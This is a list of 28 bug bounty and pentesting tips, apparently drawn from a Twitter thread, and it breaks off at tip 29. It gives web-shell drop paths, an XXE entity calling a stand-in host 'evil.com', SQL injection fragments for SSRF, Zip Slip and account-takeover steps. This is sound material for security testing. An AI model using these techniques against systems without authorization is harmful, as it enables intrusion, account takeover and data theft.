31-days-of-pentesting

31 Advanced Bug Bounty & Pentesting Tips

origin: https://twitter.com/Mohamedx20T

- TIP: 1/31-

Older APIs versions tend to be more vulnerable and they lack security mechanisms. Leverage the predictable nature of REST APIs to find old versions. Saw a call to api/v3/login? Check if api/v1/login exists as well. It might be more vulnerable.

- TIP: 2/31-

Testing a web app that requires AuthN but you don't have a user? <part 1/2>

use Google "site:[host]" to find sub-pages; some of them might not enforce AuthN
access /home, /default and use DirButser to find more sub-pages

- TIP:3/31-

download JS and look for strings like "create_user"/"register"; you might find AuthN API EPs and use them to register directly.
use http://bugmenot.com or http://login2.me to find credentials

- TIP: 4/31-

File Upload --> RCE

Windows: Malicious file to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
IIS: web-shell to C:\inetpub\wwwroot[3]
Apache: web-shell to /var/www/html/

Keep in mind that in many cases the translation of [physical path] --> [virtual directory] isn't straightforward; The test thing you can do is to to find an "arbitrary file download" vuln, scan the server and find the physical location of the virtual directory. *

- TIP:5/31-

SQLi --> RCE [1/2] | Look for tables containing records that look like file paths/URLs. Internal systems might use SQL as part of scheduled jobs/updates mechanisms. Change the value to a path/URL of a malicious file

- TIP: 6/31-

SQLi --> RCE [2/2] | Always look for customized stored producers that were written by DBAs. The producers might use dangerous PLSQL/T-SQL funcs, that your SQL payload can't access directly

- TIP: 7/31 -

SQLi --> SSRF

Use functions to trigger HTTP calls
Oracle: UTL_HTTP.request
MSSQL: master..xp_dirtree
More info: https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/

- TIP: 8/31 -

White-box Pentst? Learn the dangerous functions of the tested language.

Java: https://stackoverflow.com/a/4351516 | .NET: https://stackoverflow.com/a/20903746 | PHP: https://stackoverflow.com/a/3115645 | Ruby: https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html | (Or simply Google: [language] + security best practices)

- TIP: 9/31 -

My favorite XXE --> RCE finding:

XML Parser supports "gopher://" - SSRF on steroids!
Java debugger running locally and supports "Telnet Debugging" 🤨
Read debugger doc
Malicious payload uses gopher to call debugger and run raw Java code 🤠

- TIP: 10/31-

Found XXE? Leverage it for:

DoS: XML Bomb
LFI: <!ENTITY xxe SYSTEM "file://path"> (Try 2 slashes (Windows) and 3 (Linux) in path)
SSRF: <!ENTITY xxe SYSTEM "http://evil.com"> (Try different protocols [ssh,ftp,etc])

- TIP: 11/31 -

Recently learned: Grafana dashboards tend to use ElasticSearch API. In 30% of the times I've tested, they were vulnerable to a simple attack: If GraphQL query to Elastic contains a "filter"/"filter_id", remove it, and get access to other users' info.

Also relevant for Kibana

- TIP : 12/31-

Common misconception: AuthN EPs == Login EPs. That's wrong!

Credentials Recovery
Login using magic links/1 time code
Admin "View as..."

All should be considered as AuthN EPs as well, and require additional protection (rate limiting, etc)

- TIP: 13/31-

How to find detailed errors in APIs?

Send a string instead of a number (age=ddd)
Remove necessary params (e.g, send a PM and remove "receiver_name" param)
Break JSON structure (remove '}')
Remove necessary headers/cookies

- TIP: 14/31 -

Found a SQLI? DB doesn't have interesting data? Find tables that store website content, and leverage it to cause stored XSS.

- TIP:15/31-

What's your funniest pentest story? I once found a stored XSS in a forum, left a silly "EVIL" alert that impacted all users; They had no "remove thread" feature; had to find a SQLi to remove it 🙃

- TIP: 16/31-

==Protection for AuthN EPs ==

Rate limiting - require captcha/block IP addresses that accessed too many times
Account lockout - Many failed attempts to authenticate as user X? Block access to user X for some time.
Captcha always recommended*

- TIP:17/31-

Testing for SQLi? always remember the DBs are different. Especially concatenation & comments.

MSSQL: abc' + 'def --
MySQL: 'abc' || 'def' #
Oracle: abc' || 'def' --

keep in mind that multi-line comment format usually won't work inside an injection

- TIP: 18/31-

Before a pentest, I always:

Use Burp to catch browser traffic
Use the target app legitimately, trying to use all buttons, views, dashboards, etc
Use Burp Tree View to understand better the app, including... [in sub tweet]

Which EPs contain IDs Does the app have sub APIs? With which external services does the client-app communicates?

- TIP:19/31-

B2B apps often have a "manage your organization" feature - fertile ground for vulns!

Create 2 users belong to different orgs
Login as user2 from org2
Add user1 from org1 to your org
Find "get/export org users" API
leak user1 info

- TIP:20/31-

B2B apps often have an "invite user to your org" feature.

Invite an existing user to your org 2.Learn how the API call "accept_invite" looks using a dummy user
Accept the invite on behalf of the victim
Once victim in your org - game over

- TIP:21/30-

B2B apps often provide an "impersonate user" feature to org admins.

Create an org admin user
Learn the API call to "impersonate_user"
Try to delegate to a user from a different org
Might lead to a full account takeover

- TIP:22/31-

App provides "impersonate user" feature? Check if the app changes your auth_token after impersonation; If it does - make sure the impersonation token follows best practices (https://auth0.com/docs/best-practices/token-best-practices) It often doesn't!

- TIP:23/31-

API allows sending a private message? Try to change the "receiver_id" to an array instead of a single string/int. Might be used as a way to spam the system.

- TIP:24/31-

Where I usually find IDOR (BOLA) in apps, is in features that allow extracting data as files.

"download_report/org_id=11"
"my_activity_as_pdf?user_id=22"

These are often developed by different teams that don't fully understand the Authz mechanism

- TIP:25/31-

API with JWT in AuthZ header?

Copy JWT b64 value
Add new cookies - "auth_token", "jwt_token", "jwt", paste b64 as value
Duplicate previous API call, add cookies, remove header.
Works? AuthN supports cookies
API is 90% vulnerable to CSRF

- TIP:26/31-

App allows uploading .zip/rar archives? There's a good chance it's vulnerable to Zip Slip! Put the malicious file inside a zip, edit zip using HexEditor, use directory traversal to change final dest. Try both 1st&2nd occurrences separately

- TIP:27/31-

Find detailed errors:

Send array instead of primitive (age=[21] instead of age=21)
Send a Unicode char in HTTP method (G✔️T)
Send long Unicode string (age=✔️x100)
If the API receives a URL, remove semicolon (http// instead of http://)

- TIP:28/31-

Picture upload feature?

Upload an image and check the URL
If the file isn't stored on CDN -->
Upload an HTML file with script tags
If the upload is completed successfully, it might be an XSS

- TIP:29/30-